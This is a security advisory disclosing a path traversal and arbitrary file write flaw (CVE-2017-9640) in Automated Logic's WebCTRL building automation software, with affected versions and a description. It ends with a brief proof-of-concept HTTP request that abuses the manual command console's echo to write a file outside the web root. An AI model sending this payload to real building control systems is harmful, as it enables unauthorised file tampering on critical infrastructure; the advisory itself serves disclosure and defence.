AutomatedLogicWebCTRL6.1PathTraversalArbitraryFileWriteVendor:AutomatedLogicCorporationProduct web page: http://www.automatedlogic.com
Affected version:ALCWebCTRL,SiteScanWeb6.1 and prior
ALCWebCTRL, i-Vu6.0 and prior
ALCWebCTRL, i-Vu,SiteScanWeb5.5 and prior
ALCWebCTRL, i-Vu,SiteScanWeb5.2 and prior
Summary:WebCTRL®,AutomatedLogic's web-based building automation
system, is known for its intuitive user interface and powerful integration
capabilities. It allows building operators tooptimize and manage
all of their building systems - including HVAC, lighting, fire, elevators,
and security - all within a single HVAC controls platform. It's everything
they need tokeep occupants comfortable, manage energy conservation measures,
identify key operational problems, and validate the results.
Desc:The vulnerability is triggered by an authenticated user that can use
the manualcommand console in the management panel of the affected application.
TheManualCommand() function in ManualCommand.js allows users toperform additional
diagnostics and settings overview by using pre-defined set of commands. This
can be exploited by using the echo command towrite and/or overwrite arbitrary
files on the system including directory traversal throughout the system.
Tested on:MicrosoftWindows7Professional(6.1.7601ServicePack1Build7601)Apache-Coyote/1.1ApacheTomcat/7.0.42CJServer/1.1Java/1.7.0_25-b17
JavaHotSpotServerVM23.25-b01
Ant1.7.0Axis1.4Trove2.0.2XalanJava2.4.1Xerces-J2.6.1Vulnerability discovered by Gjoko 'LiquidWorm' Krstic@zeroscienceAdvisoryID:ZSL-2017-5430AdvisoryURL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5430.php
CVEID:CVE-2017-9640CVEURL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-964030.01.2017--PoC:GET/_common/servlet/lvl5/manualcommand?wbs=251&action=echo%20peend>..\touch.txt&id=7331HTTP/1.1Host:TARGET---GET http://TARGET/touch.txt HTTP/1.1
peend
